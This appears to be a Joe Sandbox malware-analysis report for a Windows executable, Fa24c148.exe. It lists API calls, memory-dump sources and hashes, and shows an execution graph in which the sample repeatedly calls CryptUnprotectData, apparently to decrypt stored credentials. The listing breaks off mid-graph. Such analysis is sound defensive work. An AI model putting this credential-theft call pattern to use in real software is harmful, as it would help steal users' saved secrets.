                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                    • String ID:
                                                                                                    • API String ID: 2102729457-0
                                                                                                    • Opcode ID: a44779084e06eb4c2f5f1059993455e157fff419ca32818d5ef93385285d2376
                                                                                                    • Instruction ID: 4886259ddd31cdb6a9694f28afcf93f0b8e262fe2de839e253ac22cc8a8e0fbd
                                                                                                    • Opcode Fuzzy Hash: a44779084e06eb4c2f5f1059993455e157fff419ca32818d5ef93385285d2376
                                                                                                    • Instruction Fuzzy Hash: 09F05E3198A221ABD6315B20FE4C99B7BA4FB05B11B14547AF005F11E4C2B84C81CB9C
                                                                                                    APIs
                                                                                                    • IsWindowVisible.USER32(?), ref: 00404FC4
                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405015
                                                                                                      • Part of subcall function 00404008: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040401A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                    • String ID:
                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                    • Opcode ID: d9e9b5ae7c041b12dac160d84c9107cc66b3c7e025393d4bf5171a64b49731b5
                                                                                                    • Instruction ID: 66009aff32d7b8830e361c6277d22b8a437e9b10976337e76806f1b42b6c8603
                                                                                                    • Opcode Fuzzy Hash: d9e9b5ae7c041b12dac160d84c9107cc66b3c7e025393d4bf5171a64b49731b5
                                                                                                    • Instruction Fuzzy Hash: 7A017172100609ABDF209F11DD80A5F3A25E784318F204037FB00761D1C37A9D51DAAE
                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,74DF3420,00403684,004034C6,?), ref: 004036C6
                                                                                                    • GlobalFree.KERNEL32(?), ref: 004036CD
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004036BE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                    • API String ID: 1100898210-3081826266
                                                                                                    • Opcode ID: 625fa06925f8270b1afe367a89cf7ebbb118f8284009cdbee328cf168e922138
                                                                                                    • Instruction ID: e725929a78bd54513bffc085a294c09ba81a7575a3dcdc05b4864a3003f147fa
                                                                                                    • Opcode Fuzzy Hash: 625fa06925f8270b1afe367a89cf7ebbb118f8284009cdbee328cf168e922138
                                                                                                    • Instruction Fuzzy Hash: 8AE0C2339010206BC7315F55EC0871ABBAC6F99B72F054527E9407B3A18374AC524FDC
                                                                                                    APIs
                                                                                                    • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Fa24c148.exe,C:\Users\user\Desktop\Fa24c148.exe,80000000,00000003,?,?,?,00000000,00403425,?), ref: 00405814
                                                                                                    • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402DD5,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Fa24c148.exe,C:\Users\user\Desktop\Fa24c148.exe,80000000,00000003,?,?,?,00000000,00403425), ref: 00405824
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharPrevlstrlen
                                                                                                    • String ID: C:\Users\user\Desktop
                                                                                                    • API String ID: 2709904686-224404859
                                                                                                    • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                    • Instruction ID: 54f9e395c00b90dc5451f5026eb4b74e0c6c88693738feeaeea148d18d65316b
                                                                                                    • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                    • Instruction Fuzzy Hash: C9D05EB34109209AD3227B04DC049EF77ADEF563107458467F800A21A0D3785C908AED
                                                                                                    APIs
                                                                                                      • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,00000001), ref: 10001260
                                                                                                      • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                    • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2032781626.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2032762594.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032798460.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2032821608.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_10000000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Global$Free$Alloclstrcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 852173138-0
                                                                                                    • Opcode ID: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                    • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                                                                    • Opcode Fuzzy Hash: a36c3baa5ea934aaf830980c9406ed3c53712f48e27dcab7b4d6d185e039dd99
                                                                                                    • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405958
                                                                                                    • lstrcmpiA.KERNEL32(00405B82,00000000), ref: 00405970
                                                                                                    • CharNextA.USER32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 00405981
                                                                                                    • lstrlenA.KERNEL32(00405B82,?,00000000,00405B82,00000000,[Rename],00000000,00000000,00000000), ref: 0040598A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2028141956.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2028124677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028161718.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028308619.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000462000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2028502042.0000000000493000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 190613189-0
                                                                                                    • Opcode ID: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                                                                                    • Instruction ID: 6e6ac9e946d98d70bf9313254ac0794fd071748d29dfdc9c098e77395f368069
                                                                                                    • Opcode Fuzzy Hash: f21a2c11da6ab3502238cdf1fad183a2072097fc1b5c712b12301f5e4005d6a7
                                                                                                    • Instruction Fuzzy Hash: B9F0C232504554EFC7029FA9DD0099EBBA8EF06260B2540B6E801F7210D274EE019BA9

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:7.8%
                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                    Signature Coverage:5.3%
                                                                                                    Total number of Nodes:114
                                                                                                    Total number of Limit Nodes:9
                                                                                                    execution_graph 67520 36924590 67521 369245f8 CreateWindowExW 67520->67521 67523 369246b4 67521->67523 67523->67523 67646 36839970 67647 368399b6 GetCurrentProcess 67646->67647 67649 36839a08 GetCurrentThread 67647->67649 67652 36839a01 67647->67652 67650 36839a45 GetCurrentProcess 67649->67650 67651 36839a3e 67649->67651 67653 36839a7b 67650->67653 67651->67650 67652->67649 67654 36839aa3 GetCurrentThreadId 67653->67654 67655 36839ad4 67654->67655 67524 36928d18 67525 36929020 67524->67525 67526 36928d40 67524->67526 67527 36928d49 67526->67527 67530 3692826c 67526->67530 67529 36928d6c 67531 36928277 67530->67531 67533 36929063 67531->67533 67534 36928288 67531->67534 67533->67529 67535 36929098 OleInitialize 67534->67535 67536 369290fc 67535->67536 67536->67533 67656 36839bb8 DuplicateHandle 67657 36839c4e 67656->67657 67537 16e018 67538 16e024 67537->67538 67543 35e67b78 67538->67543 67547 35e67b69 67538->67547 67551 35e67b77 67538->67551 67539 16e1d4 67545 35e67b8f 67543->67545 67544 35e68029 67544->67539 67545->67544 67555 35e68431 67545->67555 67549 35e67b70 67547->67549 67548 35e68029 67548->67539 67549->67548 67550 35e68431 CryptUnprotectData 67549->67550 67550->67549 67553 35e67b8f 67551->67553 67552 35e68029 67552->67539 67553->67552 67554 35e68431 CryptUnprotectData 67553->67554 67554->67553 67556 35e68440 67555->67556 67560 35e68a59 67556->67560 67568 35e68a68 67556->67568 67557 35e684b0 67557->67545 67561 35e68a8d 67560->67561 67562 35e68b41 67560->67562 67561->67562 67566 35e68a68 CryptUnprotectData 67561->67566 67567 35e68a59 CryptUnprotectData 67561->67567 67576 35e68c4a 67561->67576 67580 35e687a8 67562->67580 67566->67562 67567->67562 67569 35e68a8d 67568->67569 67570 35e68b41 67568->67570 67569->67570 67573 35e68c4a CryptUnprotectData 67569->67573 67574 35e68a68 CryptUnprotectData 67569->67574 67575 35e68a59 CryptUnprotectData 67569->67575 67571 35e687a8 CryptUnprotectData 67570->67571 67572 35e68d0d 67571->67572 67572->67557 67573->67570 67574->67570 67575->67570 67577 35e68c5d 67576->67577 67578 35e687a8 CryptUnprotectData 67577->67578 67579 35e68d0d 67578->67579 67579->67562 67581 35e68ef8 CryptUnprotectData 67580->67581 67582 35e68d0d 67581->67582 67582->67557 67583 ad044 67584 ad05c 67583->67584 67587 ad0b6 67584->67587 67590 369254a3 67584->67590 67599 36924748 67584->67599 67603 3692325c 67584->67603 67612 36924743 67584->67612 67591 369254a8 67590->67591 67592 36925509 67591->67592 67594 369254f9 67591->67594 67632 36923384 67592->67632 67616 3692562b 67594->67616 67621 369256fc 67594->67621 67627 36925630 67594->67627 67595 36925507 67600 3692476e 67599->67600 67601 3692325c CallWindowProcW 67600->67601 67602 3692478f 67601->67602 67602->67587 67604 36923267 67603->67604 67605 36925509 67604->67605 67607 369254f9 67604->67607 67606 36923384 CallWindowProcW 67605->67606 67608 36925507 67606->67608 67609 36925630 CallWindowProcW 67607->67609 67610 3692562b CallWindowProcW 67607->67610 67611 369256fc CallWindowProcW 67607->67611 67609->67608 67610->67608 67611->67608 67613 36924748 67612->67613 67614 3692325c CallWindowProcW 67613->67614 67615 3692478f 67614->67615 67615->67587 67617 36925630 67616->67617 67636 369256e3 67617->67636 67640 369256e8 67617->67640 67618 369256d0 67618->67595 67622 369256ba 67621->67622 67623 3692570a 67621->67623 67625 369256e3 CallWindowProcW 67622->67625 67626 369256e8 CallWindowProcW 67622->67626 67624 369256d0 67624->67595 67625->67624 67626->67624 67628 36925644 67627->67628 67630 369256e3 CallWindowProcW 67628->67630 67631 369256e8 CallWindowProcW 67628->67631 67629 369256d0 67629->67595 67630->67629 67631->67629 67633 3692338f 67632->67633 67634 36926bea CallWindowProcW 67633->67634 67635 36926b99 67633->67635 67634->67635 67635->67595 67637 369256e8 67636->67637 67638 369256f9 67637->67638 67643 36926b2f 67637->67643 67638->67618 67641 369256f9 67640->67641 67642 36926b2f CallWindowProcW 67640->67642 67641->67618 67642->67641 67644 36923384 CallWindowProcW 67643->67644 67645 36926b3a 67644->67645 67645->67638

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 526 1676f1-167725 527 167b54-167b58 526->527 528 16772b-16774e 526->528 529 167b71-167b7f 527->529 530 167b5a-167b6e 527->530 537 167754-167761 528->537 538 1677fc-167800 528->538 535 167bf0-167c05 529->535 536 167b81-167b96 529->536 546 167c07-167c0a 535->546 547 167c0c-167c19 535->547 548 167b9d-167baa 536->548 549 167b98-167b9b 536->549 552 167763-16776e 537->552 553 167770 537->553 539 167802-167810 538->539 540 167848-167851 538->540 539->540 561 167812-16782d 539->561 543 167c67 540->543 544 167857-167861 540->544 562 167c6c-167c9c 543->562 544->527 550 167867-167870 544->550 554 167c1b-167c56 546->554 547->554 555 167bac-167bed 548->555 549->555 559 167872-167877 550->559 560 16787f-16788b 550->560 556 167772-167774 552->556 553->556 604 167c5d-167c64 554->604 556->538 563 16777a-1677dc 556->563 559->560 560->562 566 167891-167897 560->566 585 16782f-167839 561->585 586 16783b 561->586 587 167cb5-167cbc 562->587 588 167c9e-167cb4 562->588 615 1677e2-1677f9 563->615 616 1677de 563->616 569 167b3e-167b42 566->569 570 16789d-1678ad 566->570 569->543 574 167b48-167b4e 569->574 583 1678c1-1678c3 570->583 584 1678af-1678bf 570->584 574->527 574->550 589 1678c6-1678cc 583->589 584->589 590 16783d-16783f 585->590 586->590 589->569 591 1678d2-1678e1 589->591 590->540 592 167841 590->592 598 1678e7 591->598 599 16798f-1679ba call 167538 * 2 591->599 592->540 602 1678ea-1678fb 598->602 617 167aa4-167abe 599->617 618 1679c0-1679c4 599->618 602->562 606 167901-167913 602->606 606->562 608 167919-167933 call 1680d8 606->608 611 167939-167949 608->611 611->569 614 16794f-167952 611->614 619 167954-16795a 614->619 620 16795c-16795f 614->620 615->538 616->615 617->527 640 167ac4-167ac8 617->640 618->569 622 1679ca-1679ce 618->622 619->620 623 167965-167968 619->623 620->543 620->623 625 1679f6-1679fc 622->625 626 1679d0-1679dd 622->626 627 167970-167973 623->627 628 16796a-16796e 623->628 629 167a37-167a3d 625->629 630 1679fe-167a02 625->630 643 1679df-1679ea 626->643 644 1679ec 626->644 627->543 631 167979-16797d 627->631 628->627 628->631 633 167a3f-167a43 629->633 634 167a49-167a4f 629->634 630->629 632 167a04-167a0d 630->632 631->543 637 167983-167989 631->637 638 167a0f-167a14 632->638 639 167a1c-167a32 632->639 633->604 633->634 641 167a51-167a55 634->641 642 167a5b-167a5d 634->642 637->599 637->602 638->639 639->569 645 167b04-167b08 640->645 646 167aca-167ad4 call 1663e0 640->646 641->569 641->642 647 167a92-167a94 642->647 648 167a5f-167a68 642->648 649 1679ee-1679f0 643->649 644->649 645->604 652 167b0e-167b12 645->652 646->645 660 167ad6-167aeb 646->660 647->569 650 167a9a-167aa1 647->650 655 167a77-167a8d 648->655 656 167a6a-167a6f 648->656 649->569 649->625 652->604 657 167b18-167b25 652->657 655->569 656->655 663 167b27-167b32 657->663 664 167b34 657->664 660->645 668 167aed-167b02 660->668 665 167b36-167b38 663->665 664->665 665->569 665->604 668->527 668->645
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2928164859.0000000000160000.00000040.00000800.00020000.00000000.sdmp, Offset: 00160000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_160000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                    • API String ID: 0-1932283790
                                                                                                    • Opcode ID: 7645520861dc8039c5b47e9e7ae5de375d9eea3060042f27546b18302f768b65
                                                                                                    • Instruction ID: 562241f667d91d42f884b85c0d9ba324b20b6a8482874a9cf87f088e2b9ba430
                                                                                                    • Opcode Fuzzy Hash: 7645520861dc8039c5b47e9e7ae5de375d9eea3060042f27546b18302f768b65
                                                                                                    • Instruction Fuzzy Hash: 95125A30A042098FCB15CF69D984AAEBBF1FF49318F158599E815DB3A1D730ED55CB50
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.2955195873.0000000035780000.00000040.00000800.00020000.00000000.sdmp, Offset: 35780000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_35780000_Fa24c148.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: >v5$>v5$>v5$N
                                                                                                    • API String ID: 0-3692199019
                                                                                                    • Opcode ID: 9a2554c9d21f769440302cb0546668a39fd1d14363e2aa0be211b6593daac517
                                                                                                    • Instruction ID: 1cb279cf7af1a7fc868a91923d0a78d4052bb187e1d58e6e1ef7af68b4d705f8
                                                                                                    • Opcode Fuzzy Hash: 9a2554c9d21f769440302cb0546668a39fd1d14363e2aa0be211b6593daac517
                                                                                                    • Instruction Fuzzy Hash: F973F731D107598EDB11EF68C854A99FBB1FF99300F51D69AE4487B221EB70AAC4CF81

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1689 166fc8-166ffe 1824 167000 call 166fc8 1689->1824 1825 167000 call 167118 1689->1825 1690 167006-16700c 1691 16700e-167012 1690->1691 1692 16705c-167060 1690->1692 1693 167014-167019 1691->1693 1694 167021-167028 1691->1694 1695 167077-16708b 1692->1695 1696 167062-167071 1692->1696 1693->1694 1697 1670fe-16713b 1694->1697 1698 16702e-167035 1694->1698 1821 16708d call 169dd0 1695->1821 1822 16708d call 16a088 1695->1822 1823 16708d call 16a0e8 1695->1823 1699 167073-167075 1696->1699 1700 16709d-1670a7 1696->1700 1710 167146-167166 1697->1710 1711 16713d-167143 1697->1711 1698->1692 1704 167037-16703b 1698->1704 1701 167093-16709a 1699->1701 1702 1670b1-1670b5 1700->1702 1703 1670a9-1670af 1700->1703 1706 1670bd-1670f7 1702->1706 1707 1670b7 1702->1707 1703->1706 1708 16703d-167042 1704->1708 1709 16704a-167051 1704->1709 1706->1697 1707->1706 1708->1709 1709->1697 1712 167057-16705a 1709->1712 1717 16716d-167174 1710->1717 1718 167168 1710->1718 1711->1710 1712->1701 1721 167176-167181 1717->1721 1720 1674fc-167505 1718->1720 1722 167187-16719a 1721->1722 1723 16750d-167519 1721->1723 1728 1671b0-1671cb 1722->1728 1729 16719c-1671aa 1722->1729 1730 167531-167536 1723->1730 1731 16751b-167521 1723->1731 1737 1671ef-1671f2 1728->1737 1738 1671cd-1671d3 1728->1738 1729->1728 1736 167484-16748b 1729->1736 1732 167523-16752f 1731->1732 1733 167539-167549 1731->1733 1732->1730 1743 167552-167556 1733->1743 1744 16754b-167550 1733->1744 1736->1720 1742 16748d-16748f 1736->1742 1745 16734c-167352 1737->1745 1746 1671f8-1671fb 1737->1746 1740 1671d5 1738->1740 1741 1671dc-1671df 1738->1741 1740->1741 1740->1745 1747 167212-167218 1740->1747 1748 16743e-167441 1740->1748 1741->1747 1749 1671e1-1671e4 1741->1749 1750 167491-167496 1742->1750 1751 16749e-1674a4 1742->1751 1752 16755c-16755d 1743->1752 1744->1752 1745->1748 1753 167358-16735d 1745->1753 1746->1745 1754 167201-167207 1746->1754 1755 16721e-167220 1747->1755 1756 16721a-16721c 1747->1756 1757 167447-16744d 1748->1757 1758 167508 1748->1758 1759 16727e-167284 1749->1759 1760 1671ea 1749->1760 1750->1751 1751->1723 1761 1674a6-1674ab 1751->1761 1753->1748 1754->1745 1762 16720d 1754->1762 1764 16722a-167233 1755->1764 